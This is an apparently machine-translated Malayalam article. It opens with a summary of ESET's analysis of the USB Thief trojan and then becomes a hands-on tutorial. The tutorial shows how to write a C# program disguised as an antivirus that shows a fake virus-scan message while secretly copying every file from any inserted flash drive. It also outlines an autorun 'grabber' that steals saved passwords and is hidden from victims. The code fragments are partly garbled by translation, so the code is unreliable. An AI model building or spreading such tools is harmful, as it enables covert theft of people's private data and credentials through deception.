മാൽവെയർ പ്രവർത്തിപ്പിക്കുന്നതിന് സ്റ്റാർട്ടപ്പിലും വ്യാജ ആപ്ലിക്കേഷൻ കുറുക്കുവഴികളിലും സ്വയം ഇൻസ്റ്റാൾ ചെയ്യുന്ന മറ്റ് യുഎസ്ബി ഭീഷണികളിൽ നിന്ന് വ്യത്യസ്തമായി, യുഎസ്ബി കള്ളൻ വ്യത്യസ്തമായി പ്രവർത്തിക്കുന്നു. ഫയർഫോക്സ്, നോട്ട്പാഡ്++, ട്രൂക്രിപ്റ്റ് തുടങ്ങിയ ആപ്ലിക്കേഷനുകളുടെ പോർട്ടബിൾ പതിപ്പുകൾ ഉപയോക്താക്കൾ ഫ്ലാഷ് ഡ്രൈവുകളിൽ സംഭരിക്കുന്നതിനാണ് ട്രോജൻ രൂപകൽപ്പന ചെയ്തിരിക്കുന്നത്. ക്ഷുദ്രവെയർ അത്തരം പ്രോഗ്രാമുകളുടെ ഡൗൺലോഡ് ശൃംഖലയിലേക്ക് സ്വയം സമന്വയിപ്പിക്കുന്നു, ഒരു പ്ലഗിൻ അല്ലെങ്കിൽ DLL ഫയലായി അവതരിപ്പിക്കുന്നു. അങ്ങനെ, ഒരു ഉപയോക്താവ് ഒരു ഫ്ലാഷ് ഡ്രൈവിൽ നിന്ന് പരിചിതമായ ഒരു ആപ്ലിക്കേഷൻ സമാരംഭിക്കുമ്പോൾ, ട്രോജനും അതോടൊപ്പം (പശ്ചാത്തലത്തിൽ) സമാരംഭിക്കുന്നു.

ക്ഷുദ്രവെയറിൻ്റെ അജ്ഞാത രചയിതാവ് അവൻ്റെ വികസനത്തിന് ഗുരുതരമായ സംരക്ഷണം നൽകി. യുഎസ്ബി കള്ളൻ അതിൻ്റെ തനതായ ഐഡിയും ഡ്രൈവ് പാരാമീറ്ററുകളും ഉപയോഗിച്ച് ഓരോ രോഗബാധിത ഫ്ലാഷ് ഡ്രൈവിലേക്കും ബന്ധിപ്പിക്കുന്നു. ചില ട്രോജൻ ഫയലുകൾ AES128 എൻക്രിപ്ഷനാൽ സംരക്ഷിക്കപ്പെടുന്നു, കൂടാതെ ഉപകരണത്തിൻ്റെ തനതായ പാരാമീറ്ററുകൾ അടിസ്ഥാനമാക്കിയാണ് കീ ജനറേറ്റ് ചെയ്യുന്നത്. കൂടാതെ, ക്ഷുദ്രവെയർ ഫയലുകളുടെ പേരുകൾ ഓരോ കേസിലും വ്യത്യാസപ്പെട്ടിരിക്കുന്നു: ഫ്ലാഷ് ഡ്രൈവിലെ ഉള്ളടക്കത്തെയും ഫയലുകൾ സൃഷ്ടിച്ച സമയത്തെയും അടിസ്ഥാനമാക്കിയാണ് അവ സൃഷ്ടിക്കുന്നത്. നിങ്ങൾ USB തീഫ് മറ്റൊരു ഫ്ലാഷ് ഡ്രൈവിലേക്കോ സാധാരണ ഹാർഡ് ഡ്രൈവിലേക്കോ പകർത്താൻ ശ്രമിക്കുകയാണെങ്കിൽ, ഈ രണ്ട്-ഘട്ട സംരക്ഷണ സംവിധാനം ക്ഷുദ്രവെയർ പ്രവർത്തിക്കുന്നത് തടയുകയും റിവേഴ്സ് എഞ്ചിനീയറിംഗിനെ ഗുരുതരമായി സങ്കീർണ്ണമാക്കുകയും ചെയ്യും.

ട്രോജൻ ഘടന

USB തീഫ് ഒരു ഫ്ലാഷ് ഡ്രൈവിൽ നിന്ന് നേരിട്ട് പ്രവർത്തിക്കുന്നു, കൂടാതെ സിസ്റ്റത്തിൽ തന്നെ യാതൊരു അടയാളങ്ങളും അവശേഷിപ്പിക്കില്ല. ട്രോജനിൽ ആറ് ഫയലുകൾ അടങ്ങിയിരിക്കുന്നു, അവയിൽ നാലെണ്ണം എക്സിക്യൂട്ടബിൾ ആണ്, രണ്ടെണ്ണം കൂടി കോൺഫിഗറേഷൻ ഡാറ്റ ഉൾക്കൊള്ളുന്നു. ഒരു പ്രോഗ്രാമിൻ്റെ പോർട്ടബിൾ പതിപ്പിനൊപ്പം ട്രോജൻ സമാരംഭിക്കുന്നതിനുള്ള ഉത്തരവാദിത്തം ആദ്യത്തെ ലോഡറിനാണ്. അവൻ USB ഉപകരണം പരിശോധിച്ച് മോഷ്ടിച്ച വിവരങ്ങൾ അതിൽ എഴുതി ഇവിടെ സൂക്ഷിക്കാൻ കഴിയുമെന്ന് ഉറപ്പാക്കുന്നു. അപ്പോൾ രണ്ടാമത്തെ ലോഡർ ആരംഭിക്കുന്നു. ഇത് പാരൻ്റ് പ്രോസസുകളുടെ പേരുകൾ പരിശോധിക്കുകയും അത് ഒരു സാധാരണ പരിതസ്ഥിതിയിൽ പ്രവർത്തിക്കുന്നുവെന്ന് ഉറപ്പാക്കുകയും ചെയ്യുന്നു (അത് ആരും വിശകലനം ചെയ്യാൻ ശ്രമിക്കുന്നില്ല). മൂന്നാമത്തെ ലോഡർ, സിസ്റ്റത്തിൽ ആൻ്റിവൈറസുകളുടെ സാന്നിധ്യം പരിശോധിക്കുന്നു.

റണ്ണിംഗ് പ്രക്രിയയിൽ നിർമ്മിച്ച അവസാനത്തെ, നാലാമത്തെ പേലോഡ്, ഡാറ്റ മോഷണത്തിന് നേരിട്ട് ഉത്തരവാദിയാണ്. ലഭ്യമായ എല്ലാ ഡ്രൈവുകളിൽ നിന്നും ഡോക്യുമെൻ്റുകൾ, ഇമേജുകൾ, ഫയൽ ലിസ്റ്റുകൾ, വിൻഡോസ് രജിസ്ട്രി ഡാറ്റ, WinAudit ഉപയോഗിച്ച് ശേഖരിച്ച വിവരങ്ങൾ എന്നിവ USB കള്ളൻ മോഷ്ടിക്കുന്നു. മോഷ്ടിച്ച എല്ലാ ഡാറ്റയും ഒരു ഫ്ലാഷ് ഡ്രൈവിൽ സംഭരിക്കുകയും എലിപ്റ്റിക് ക്രിപ്റ്റോഗ്രഫി ഉപയോഗിച്ച് എൻക്രിപ്റ്റ് ചെയ്യുകയും ചെയ്യുന്നു.

USB തീഫ് ഉപയോഗിച്ചുള്ള ആക്രമണങ്ങൾ ഇതുവരെ ഒരു സാധാരണ രീതിയല്ലെന്ന് ESET വിദഗ്ധർ അഭിപ്രായപ്പെടുന്നു. എന്നിരുന്നാലും, ട്രോജൻ വളരെ അപകടകരമാണ്, കാരണം അതിൻ്റെ സാന്നിധ്യം കണ്ടെത്തുന്നത് ബുദ്ധിമുട്ടാണ്, കൂടാതെ യുഎസ്ബി ഡ്രൈവ് നീക്കം ചെയ്‌തതിനുശേഷം, വിവര മോഷണത്തിൻ്റെ സൂചനകളൊന്നും അവശേഷിക്കുന്നില്ല. മാൽവെയർ രചയിതാവിന് വേണമെങ്കിൽ, മറ്റേതെങ്കിലും ക്ഷുദ്രവെയർ ഉപയോഗിച്ച് ഡാറ്റ മോഷണത്തിനുള്ള പേലോഡ് മാറ്റി പകരം തൻ്റെ ക്ഷുദ്രവെയർ "പുനർനിർമ്മാണം" ചെയ്യാമെന്നും കമ്പനിയുടെ റിപ്പോർട്ട് പറയുന്നു.

കേവലം മനുഷ്യർക്ക്, പ്രമാണങ്ങൾ/സിനിമകൾ/ഫോട്ടോകൾ, മറ്റ് വ്യക്തിഗത (ചിലപ്പോൾ വളരെ വ്യക്തിപരമായ) വിവരങ്ങൾ കൈമാറുന്നതിനുള്ള ഒരു ഉപകരണമാണ് ഫ്ലാഷ് ഡ്രൈവ്. എന്നാൽ ഹാക്കർമാർക്ക്, ഫ്ലാഷ് ഡ്രൈവ് ഒരു ഇരയും ഒരു പോരാട്ട ഉപകരണവുമാണ്. നിങ്ങളുടെ കമ്പ്യൂട്ടറിലേക്ക് ഫ്ലാഷ് ഡ്രൈവുകളിൽ നിന്ന് നിശബ്ദമായി ഡാറ്റ ചോർത്തുന്നതിൻ്റെ എല്ലാ സങ്കീർണതകളും ഇന്ന് ഞാൻ നിങ്ങളോട് പറയും, കൂടാതെ ഒരു "വലിയ" കമ്പ്യൂട്ടറിൽ നിന്ന് പാസ്‌വേഡുകൾ ബാക്കപ്പ് ചെയ്യുന്നതിനുള്ള പ്രോഗ്രാമുകളാക്കി നിരുപദ്രവകരമായ ഫ്ലാഷ് ഡ്രൈവുകളെ എങ്ങനെ മാറ്റാമെന്നും നിങ്ങളെ പഠിപ്പിക്കും.

മറ്റുള്ളവരുടെ ഫ്ലാഷ് ഡ്രൈവുകൾക്കുള്ള കെണി

"ദുഷ്ട കമ്പ്യൂട്ടർ" പ്രോഗ്രാമിൻ്റെ ആശയം ഇപ്രകാരമായിരിക്കും. ഞങ്ങൾ ഒരു സൂപ്പർ-മെഗാ അഡ്വാൻസ്ഡ് ആൻ്റിവൈറസ് ആണെന്ന് നടിക്കുന്ന ഒരു ചെറിയ ഉപകരണം വികസിപ്പിക്കും, ഫ്ലാഷ് ഡ്രൈവുകളിൽ നിന്ന് "അപകടകരമായ" വൈറസുകൾ കാര്യക്ഷമമായി നീക്കം ചെയ്യുക എന്നതാണ് ഇതിൻ്റെ ഉദ്ദേശ്യം. വൈറസുകൾ ബാധിച്ച ഒരു ഫ്ലാഷ് ഡ്രൈവ് ആരെയും ആശ്ചര്യപ്പെടുത്തില്ല, അതിനാൽ ഞങ്ങളുടെ പ്രത്യേക "ആൻ്റിവൈറസ്" വഞ്ചനാപരമായ ഉപയോക്താവിന് ആശങ്കയുണ്ടാക്കില്ല. നേരെമറിച്ച്, നിങ്ങളുടെ കമ്പ്യൂട്ടറിലേക്ക് ഒരു ഫ്ലാഷ് ഡ്രൈവ് തിരുകുകയും ഇതുപോലുള്ള ഒരു സന്ദേശം കാണുകയും ചെയ്യുമ്പോൾ: “ഒരു വൈറസ് കണ്ടെത്തി. രോഗബാധിതരായ ഫയലുകൾക്കായി ഞാൻ എല്ലാ ഫയലുകളുടെയും വിശദമായ സ്കാൻ നടത്തുന്നു., – ഈ പ്രവർത്തനത്തിൻ്റെ പൂർത്തീകരണത്തിനായി ഇത് തീർച്ചയായും കാത്തിരിക്കും.

ഉപകരണങ്ങൾ തയ്യാറാക്കുന്നു

ഇപ്പോൾ ഫാഷനബിൾ ആയ C#-ൽ ഞങ്ങൾ അത്തരമൊരു ഉപയോഗപ്രദമായ പ്രോഗ്രാം എഴുതും. ഭാഷയുടെ വഴക്കവും .NET പ്ലാറ്റ്‌ഫോമിൻ്റെ വിശാലമായ പ്രവർത്തനവും മിന്നൽ വേഗതയിൽ ആപ്ലിക്കേഷനുകൾ വികസിപ്പിക്കാൻ നിങ്ങളെ അനുവദിക്കുന്നു. ഇതാണ് നമുക്ക് വേണ്ടത്. കോഡിംഗിൻ്റെ മടുപ്പിക്കുന്ന പ്രക്രിയയല്ല, കൊയ്യാൻ കഴിയുന്ന വിളവിലാണ് ഞങ്ങൾക്ക് താൽപ്പര്യം.

ഞങ്ങളുടെ ആപ്ലിക്കേഷൻ്റെ പ്രധാന ഘടകങ്ങളിലൊന്ന് ഇൻ്റർഫേസ് ആയിരിക്കും. നിങ്ങൾ അത് എത്രത്തോളം ദൃഢമാക്കുന്നുവോ, ഇര പിടിക്കുന്നത് ശ്രദ്ധിക്കാതിരിക്കാനും ആൻ്റി-വൈറസ് സ്കാൻ പൂർത്തിയാകുന്നതുവരെ ശാന്തമായി കാത്തിരിക്കാനുമുള്ള സാധ്യത കൂടുതലാണ്. ഞാൻ അധികം ബുദ്ധിമുട്ടിച്ചില്ല, ഒരു ക്ലീൻ പ്രോജക്റ്റിൻ്റെ രൂപത്തിൽ ഒരു ചിത്രവും പ്രോഗ്രസ്ബാറും മാത്രം സ്ഥാപിച്ചു. നിങ്ങൾക്ക് ഒരു സ്ഫോടനം നടത്താനും മനസ്സിനെ ത്രസിപ്പിക്കുന്ന ഒരു ഡിസൈൻ ഉണ്ടാക്കാനും കഴിയും. ചില യഥാർത്ഥ ആൻ്റിവൈറസിൻ്റെ രൂപകൽപ്പന നോക്കാനും നിങ്ങളുടെ ആപ്ലിക്കേഷൻ ഏകദേശം അതേ ശൈലിയിൽ രൂപകൽപ്പന ചെയ്യാനും ഞാൻ നിങ്ങളെ ഉപദേശിക്കുന്നു.

നമുക്ക് ചുമതല സജ്ജമാക്കാം

ഓർഗനൈസേഷണൽ പ്രശ്നങ്ങളും പ്രവർത്തനത്തിൻ്റെ അൽഗോരിതവും ഞങ്ങൾ തീരുമാനിച്ചുവെന്ന് ഞങ്ങൾ അനുമാനിക്കും; അതിനാൽ, ഫ്ലാഷ് ഡ്രൈവിൻ്റെ ഇൻസ്റ്റാളേഷൻ സമയത്ത് ഞങ്ങളുടെ ആൻ്റിവൈറസ് അതിൻ്റെ വൃത്തികെട്ട ജോലി ആരംഭിക്കണം. സിസ്റ്റത്തിൽ ഒരു പുതിയ ഡിസ്ക് പ്രത്യക്ഷപ്പെടുമ്പോൾ, ഞങ്ങളുടെ പ്രോഗ്രാം അതിൻ്റെ അക്ഷരം നിർണ്ണയിക്കുകയും പകർത്താൻ തുടങ്ങുകയും വേണം.

ഈ ലേഖനം എഴുതാൻ തുടങ്ങുന്നതിനുമുമ്പ്, സമാനമായ ഒരു പ്രോഗ്രാമിൻ്റെ സോഴ്സ് കോഡ് ഞാൻ കണ്ടു. "നീക്കം ചെയ്യാവുന്ന മീഡിയ" തരം ഡ്രൈവിൻ്റെ സാന്നിധ്യത്തിനായി എല്ലാ ഡിസ്കുകളിലും ഇടയ്ക്കിടെ തിരഞ്ഞുകൊണ്ട് ഒരു ഫ്ലാഷ് ഡ്രൈവിൻ്റെ സാന്നിധ്യം ഉദാഹരണത്തിൻ്റെ രചയിതാവ് നിർണ്ണയിച്ചു. ആദ്യമൊക്കെ ഇതേ വഴിയേ പോകാനായിരുന്നു വിചാരിച്ചതെങ്കിലും എൻ്റെ ഉള്ളിലെ ശബ്ദം യുക്തിരാഹിത്യം നിർദ്ദേശിച്ചു. എല്ലാ ഗുണങ്ങളും എല്ലാ ഗുണങ്ങളും തൂക്കിനോക്കിയ ശേഷം, ഈ ആശയം ഉപേക്ഷിച്ച് ഞാൻ MSND യിലേക്ക് നടക്കാൻ പോയി. അഞ്ച് മിനിറ്റിനുശേഷം ഞാൻ അത് വെറുതെ ചെയ്തതല്ലെന്ന് മനസ്സിലായി. ഉത്തരം കണ്ടെത്തി!

WinAPI ഇല്ലാതെ വഴിയില്ല...

പുതിയ ഉപകരണങ്ങൾ (ഞങ്ങളുടെ കാര്യത്തിൽ, ഒരു ഫ്ലാഷ് ഡ്രൈവ്) കണക്റ്റുചെയ്യുന്നതിനെക്കുറിച്ച് കണ്ടെത്താനുള്ള ഏറ്റവും ഫലപ്രദമായ മാർഗം WM_DEVICECHANGE സന്ദേശം പിടിച്ച് വിശകലനം ചെയ്യുക എന്നതാണ്. ഉപകരണത്തിൻ്റെ ഇൻസ്റ്റാളേഷൻ സമയത്ത്, എല്ലാ വിൻഡോകളിലേക്കും സന്ദേശം അയയ്‌ക്കും, ഞങ്ങളുടെ ആപ്ലിക്കേഷനിൽ ഇത് എളുപ്പത്തിൽ പ്രോസസ്സ് ചെയ്യാം. ഇത് ചെയ്യുന്നതിന്, WindowProc ഫംഗ്ഷൻ വിവരിച്ചാൽ മാത്രം മതി. പ്രായോഗികമായി, ഇത് ഇതുപോലെ കാണപ്പെടുന്നു:

LResult CALLBACK WindowProc (HWND hwnd, //window identifier UINT uMsg, //സന്ദേശ ഐഡൻ്റിഫയർ WPARAM wParam, //സംഭവിച്ച സംഭവം LPARAM lParam //ഡാറ്റ അടങ്ങിയ ഒരു ഘടനയിലേക്കുള്ള പോയിൻ്റർ)

ഫംഗ്‌ഷൻ്റെ ബോഡിയിൽ, WM_DEVICECHANGE സന്ദേശവുമായി ബന്ധപ്പെട്ട വിവിധ ഇവൻ്റുകളുടെ ഐഡൻ്റിഫയറുകളുമായി നിങ്ങൾ WParam പാരാമീറ്ററിൻ്റെ മൂല്യം താരതമ്യം ചെയ്യേണ്ടതുണ്ട്. ഞങ്ങളുടെ ഉദാഹരണത്തിന് ഇത് ഇതായിരിക്കും:

  • DBT_DEVICEARRIVAL - ഉപകരണങ്ങൾ ചേർത്തു
  • DBT_DEVICEREMOVECOMPLETE - ഉപകരണങ്ങൾ പൂർണ്ണമായും നീക്കം ചെയ്‌തു
  • ശരി, പുതിയ ഉപകരണങ്ങൾ കണക്റ്റുചെയ്തിട്ടുണ്ടെന്ന് എങ്ങനെ സ്ഥാപിക്കാമെന്ന് ഞങ്ങൾക്കറിയാം, എന്നാൽ കണക്റ്റുചെയ്തത് USB ഫ്ലാഷ് ഡ്രൈവ് ആണെന്ന് എങ്ങനെ ഉറപ്പിക്കാം? "ഹോട്ട് പ്ലഗ്" (ഞാൻ യുഎസ്ബിയെക്കുറിച്ചാണ് സംസാരിക്കുന്നത്) (പ്രിൻറർ, സ്കാനർ, മോഡം മുതലായവ) കഴിവുള്ള ഒരു വലിയ വൈവിധ്യമാർന്ന ഉപകരണങ്ങൾ ഉണ്ട്. ഭാഗ്യവശാൽ, ഈ പ്രശ്നം വളരെ ലളിതമായി പരിഹരിക്കാൻ കഴിയും. LParam പാരാമീറ്റർ ഉപയോഗിച്ച്, dbch_devicetype ഫീൽഡ് ഉള്ള _DEV_BROADCAST_HDR ഘടനയിലേക്ക് നമുക്ക് ആക്സസ് ചെയ്യാൻ കഴിയും. അതിനാൽ, ഈ ഫീൽഡുകളുടെ മൂല്യങ്ങളെ അടിസ്ഥാനമാക്കി, ഉചിതമായ നിഗമനങ്ങളിൽ എത്തിച്ചേരുന്നു. ഇത് DEV_DEVTYP_VOLUME എന്നതിന് തുല്യമാണെങ്കിൽ, സന്തോഷിക്കാനും കൈകൊട്ടാനുമുള്ള സമയമാണിത് - ഒരു ഫ്ലാഷ് ഡ്രൈവ് ഞങ്ങളുമായി ബന്ധിപ്പിച്ചിരിക്കുന്നു!

    Typedef struct _DEV_BROADCAST_HDR ( DWORD dbch_size; //ഘടനയുടെ വലുപ്പം DWORD dbch_devicetype; //ഉപകരണ തരം DWORD dbch_reserved; //സംവരണം ചെയ്‌തത്, ഉപയോഗിച്ചിട്ടില്ല )DEV_BROADCAST_HDRD

    ഞങ്ങളുടെ പിസിയിൽ ഒരു ഫ്ലാഷ് ഡ്രൈവ് ചേർത്തു, സിസ്റ്റം അതിനായി നൽകിയിരിക്കുന്ന ഡ്രൈവ് ലെറ്റർ കണ്ടെത്താൻ ശ്രമിക്കാം. "അത്ഭുതങ്ങളുടെ ഫീൽഡ്" എന്നതിലെന്നപോലെ, നിങ്ങൾക്കത് ഊഹിക്കാം, എന്നാൽ DEV_BROADCAST_VOLUME ഘടനയിൽ നിന്ന് വിവരങ്ങൾ പിൻവലിക്കുന്നതാണ് നല്ലത്.

    Typedef struct _DEV_BROADCAST_VOLUME ( DWORD dbcv_size; //ഘടനയുടെ വലുപ്പം DWORD dbcv_devicetype; //ഉപകരണ തരം DWORD dbcv_reserved; //Reserved DWORD dbcv_unitmak; )DEV_BROADCAST_VOLUME, *PDEV_ BROADCAST_VOLUME;

    ഈ ഘടനയിലെ എല്ലാ ഫീൽഡുകളിലും, ഞങ്ങൾക്ക് dbcv_unitmask-ൽ താൽപ്പര്യമുണ്ട്. ഈ പ്രോപ്പർട്ടിയിൽ കുറച്ച് അക്ഷരം മാത്രമേ അടങ്ങിയിട്ടുള്ളൂ, അതിൻ്റെ പ്രതീകാത്മക പ്രാതിനിധ്യമല്ല. ഉദാഹരണത്തിന്, മൂല്യം 0 ആണെങ്കിൽ, ഡ്രൈവ് അക്ഷരം A ആയിരിക്കും; 1 ആണെങ്കിൽ, ബി മുതലായവ. ഒരു പ്രതീകാത്മക കത്ത് ലഭിക്കുന്നതിനുള്ള സൗകര്യത്തിനായി, ഒരു ഫംഗ്ഷൻ എഴുതുന്നതാണ് നല്ലത്.

    നിങ്ങൾ വളരെക്കാലമായി ഞങ്ങളുടെ കോളം വായിക്കുകയും API ഫംഗ്‌ഷനുകൾ നന്നായി അറിയുകയും ചെയ്യുന്നുവെങ്കിൽ, ലേഖനത്തിൻ്റെ അടുത്ത ഭാഗം വായിക്കേണ്ട ആവശ്യമില്ല. എഡിറ്റർ തുറന്ന് ആപ്ലിക്കേഷനുകൾ ശിൽപം ചെയ്യാൻ ആരംഭിക്കുക. ആവശ്യമായ എല്ലാ ഘടനകളും പ്രവർത്തനങ്ങളും ഞാൻ വിവരിച്ചിട്ടുണ്ട്; നിങ്ങൾ ചെയ്യേണ്ടത് അവയെ ഒരു പ്രോഗ്രാമിൽ ഉൾപ്പെടുത്തുക എന്നതാണ്. നിങ്ങളുടെ മനസ്സ് ഉറപ്പിക്കുക, ഞാൻ പ്രത്യേകിച്ച് .NET, C# എന്നിവയിലേക്ക് ഡൈവിംഗ് ആരംഭിക്കും.

    നമുക്ക് .NET അടിക്കാം

    C# ഭാഷയിൽ നിങ്ങളുടെ അറിവ് പരിശീലിക്കാനും പ്രയോഗിക്കാനും തുടങ്ങാനുള്ള സമയം. "എന്തൊരു നരകമാണ്? - നിങ്ങൾ ചോദിക്കുന്നു. - വിൻഎപിഐയെക്കുറിച്ച് സംസാരിക്കാൻ ഞാൻ പകുതി ലേഖനം ചെലവഴിച്ചു, തുടർന്ന് എല്ലാ ഫംഗ്ഷനുകളും നേറ്റീവ് കോഡിൻ്റെ രൂപത്തിൽ വിളിക്കാൻ ഞാൻ മണ്ടത്തരമായി തീരുമാനിച്ചു? വികസനത്തിൻ്റെ മിന്നൽ വേഗത എവിടെയാണ്?

    ചില വഴികളിൽ നിങ്ങൾ ശരിയാണ്. ഞങ്ങളുടെ ആപ്ലിക്കേഷൻ തീർച്ചയായും WinAPI ഫംഗ്ഷനുകൾ ഉപയോഗിക്കും (ഇതിലും ലളിതമായ മാർഗമില്ല), എന്നാൽ ഞങ്ങൾ അവ സ്വയം വിവരിക്കില്ല. ഫ്ലാഷ് ഡ്രൈവുകൾ തിരിച്ചറിയുന്നതിനുള്ള പ്രശ്നം പല ഡവലപ്പർമാരും നേരിട്ടിട്ടുണ്ട്. ഈ ഏറ്റുമുട്ടലുകളുടെ ഫലമായി, C#-നുള്ള സൗജന്യ ക്ലാസുകൾ പ്രത്യക്ഷപ്പെടാൻ തുടങ്ങി, അതിൽ ആവശ്യമായ എല്ലാ പ്രവർത്തനങ്ങളും ഇതിനകം നടപ്പിലാക്കിയിട്ടുണ്ട്. അത്തരം ഒരു ടെംപ്ലേറ്റ് (ഘടകം വായിക്കുക) ഞങ്ങളുടെ പ്രോജക്റ്റിലേക്ക് കണക്റ്റുചെയ്‌ത് രണ്ട് രീതികൾ വിളിക്കുക മാത്രമാണ് ഞങ്ങൾ ചെയ്യേണ്ടത്. ഞങ്ങൾ ഇപ്പോൾ ഈ ക്ലാസുകളിലൊന്ന് ഉപയോഗിക്കും. എന്നാൽ ഈ പ്രോഗ്രാം വിൻഡോസ് എപിഐയിലേക്ക് മാറ്റുമ്പോൾ മുകളിൽ വിവരിച്ച ഘടനകളെക്കുറിച്ചുള്ള അറിവ് തീർച്ചയായും ഉപയോഗപ്രദമാകും.

    സമാനമായ പ്രശ്നങ്ങൾ പരിഹരിക്കുന്ന ധാരാളം റെഡിമെയ്ഡ് ക്ലാസുകൾ ഉണ്ട്, എന്നാൽ ജാൻ ഡോളിനേയിൽ നിന്നുള്ളത് എനിക്ക് ഏറ്റവും ഇഷ്ടപ്പെട്ടു. ഈ വ്യക്തി വളരെ എളുപ്പത്തിൽ ഉപയോഗിക്കാനും മനസ്സിലാക്കാനും കഴിയുന്ന ഒരു കോഡ്, DriveDetector ക്ലാസ് എഴുതി, അതിന് ഇവ ചെയ്യാനാകും:

  • ഒരു ഫ്ലാഷ് ഡ്രൈവ് കണക്റ്റുചെയ്തിട്ടുണ്ടോ എന്ന് നിർണ്ണയിക്കുക
  • കണക്റ്റുചെയ്‌ത ഫ്ലാഷ് ഡ്രൈവ് അൺമൗണ്ട് ചെയ്യുന്നതിനുള്ള ഒരു അഭ്യർത്ഥന നിർവ്വചിക്കുക
  • ഫ്ലാഷ് ഡ്രൈവ് പ്രവർത്തനരഹിതമാക്കിയിട്ടുണ്ടോ എന്ന് നിർണ്ണയിക്കുക
  • പുതുതായി കണക്റ്റുചെയ്‌ത ഫ്ലാഷ് ഡ്രൈവിൻ്റെ ഡ്രൈവ് ലെറ്റർ നേടുക
  • ഒരു ഫ്ലാഷ് ഡ്രൈവിൽ നിന്ന് തുറന്ന ഫയലുകളുടെ ഒരു ലിസ്റ്റ് നൽകുക
  • ഏറ്റവും പ്രധാനമായി, ഈ ക്ലാസ് പ്രവർത്തിക്കാൻ വളരെ എളുപ്പമാണ് - നിങ്ങൾ ഇത് ഇപ്പോൾ കാണും. നിങ്ങളുടെ പ്രോജക്റ്റിലേക്ക് ഒരു ക്ലാസ് കണക്റ്റുചെയ്യുന്നത് ഒരു സാധാരണ രീതിയിലാണ് ചെയ്യുന്നത്, അവിടെ നിർത്തുന്നതിൽ അർത്ഥമില്ല. അതിനാൽ, നമുക്ക് നേരിട്ട് സമാരംഭത്തിലേക്ക് പോകാം. ഇത് ഇതുപോലെയാണ് ചെയ്യുന്നത്:

    FlashDriveDetector = പുതിയ DriveDetector(); flashDriveDetector.DeviceArrived += പുതിയ DriveDetectorEventHandler(OnDriveArrived); flashDriveDetector.DeviceRemoved += പുതിയ DriveDetectorEventHandler(OnDriveRemoved);

    DriveDetector ക്ലാസ് ഒബ്‌ജക്‌റ്റ് തൽക്ഷണം ചെയ്‌ത ശേഷം, DevieArrived(), DriveRemoved() എന്നിവയ്‌ക്കായുള്ള ഇവൻ്റ് ഹാൻഡ്‌ലറുകൾ ഞാൻ നിർവ്വചിക്കുന്നു. അവരുടെ പേരിൽ നിന്ന് അവർ ഉത്തരവാദികൾ എന്താണെന്ന് ഊഹിക്കാൻ പ്രയാസമില്ല. എല്ലാ ഇനീഷ്യലൈസേഷൻ കോഡും Form1() രീതിയിൽ എഴുതുന്നതാണ് നല്ലത്. ഞങ്ങളുടെ പ്രോഗ്രാമിൻ്റെ പ്രധാന കോഡ് DeviceArrived ഇവൻ്റ് ഹാൻഡ്‌ലറിൽ സ്ഥിതിചെയ്യും. ഇൻസെറ്റിൽ നിങ്ങൾ അതിൻ്റെ വാചകം കാണും:

    String dirName = Environment.GetCommandLineArgs() + "flash_" + DateTime.Now.ToString("dd-MM-yy-hh-mm-ss"); CreateDirectory (dirName);

    xDirectory flashcopier = പുതിയ xDirectory();

    flashcopier.IndexComplete += പുതിയ IndexCompleteEventHandler(IndexCompleate);

    flashcopier.ItemCopied += പുതിയ ItemCopiedEventHandler(ItemCopied);

    flashcopier.CopyComplete += പുതിയ CopyCompleteEventHandler(CopyComplete);

    flashcopier.Source = new DirectoryInfo(e.Drive.ToString());

    flashcopier.Destination = new DirectoryInfo(dirName);

    flashcopier.Overwrite = true;

    ഞങ്ങളുടെ ആപ്ലിക്കേഷൻ പ്രവർത്തിപ്പിച്ച് യുഎസ്ബി ഫ്ലാഷ് ഡ്രൈവ് ഇടാൻ ശ്രമിക്കുക. കുറച്ച് നിമിഷങ്ങൾക്കുള്ളിൽ (നിങ്ങളുടെ ഫ്ലാഷ് ഡ്രൈവ് എത്രമാത്രം അലങ്കോലപ്പെട്ടിരിക്കുന്നു എന്നതിനെ ആശ്രയിച്ച്), USB ഡ്രൈവിലെ മുഴുവൻ ഉള്ളടക്കങ്ങളും നിങ്ങൾ പുതുതായി സൃഷ്ടിച്ച ആപ്ലിക്കേഷൻ ലോഞ്ച് ചെയ്ത ഫോൾഡറിലേക്ക് മാറ്റും.

    യുഎസ്ബി ഗ്രാബർ

    ഇപ്പോൾ നമുക്ക് വിപരീത പ്രശ്നം നോക്കാം, വിളിക്കപ്പെടുന്നവ സൃഷ്ടിക്കുന്നതിൻ്റെ സൂക്ഷ്മതകളെക്കുറിച്ച് സംസാരിക്കാം. ഫ്ലാഷ് ഡ്രൈവ് ഗ്രാബറുകൾ. സൃഷ്ടിയുടെ തത്വം തികച്ചും സമാനമാണ്. ഫ്ലാഷ് ഡ്രൈവ് ഇൻസ്റ്റാൾ ചെയ്ത ശേഷം സ്വയമേവ സമാരംഭിക്കുന്ന ഒരു ലളിതമായ ആപ്ലിക്കേഷൻ നിങ്ങൾ എഴുതേണ്ടതുണ്ട്.

    പ്രവർത്തന സമയത്ത്, ജനപ്രിയ പ്രോഗ്രാമുകൾ സംരക്ഷിച്ച പാസ്‌വേഡുകൾ സംഭരിക്കുന്ന ഫോൾഡറുകൾ/രജിസ്ട്രി കീകൾ വഴി ആപ്ലിക്കേഷൻ തിരയുകയും സാധ്യമെങ്കിൽ, എല്ലാ വിവരങ്ങളും അതിൻ്റെ ഫോൾഡറുകളിൽ ഒന്നിലേക്ക് പകർത്തുകയും ചെയ്യും. പാവപ്പെട്ട ഉപയോക്താക്കൾക്കിടയിൽ നിങ്ങളുടെ ഓട്ടോറാൻ സംശയം ജനിപ്പിക്കുന്നത് തടയാൻ, അത് ശ്രദ്ധാപൂർവം മറച്ചുപിടിക്കാൻ ശ്രമിക്കൂ. ഉദാഹരണത്തിന്, ലോഞ്ച് മെനുവിന് കീഴിൽ.

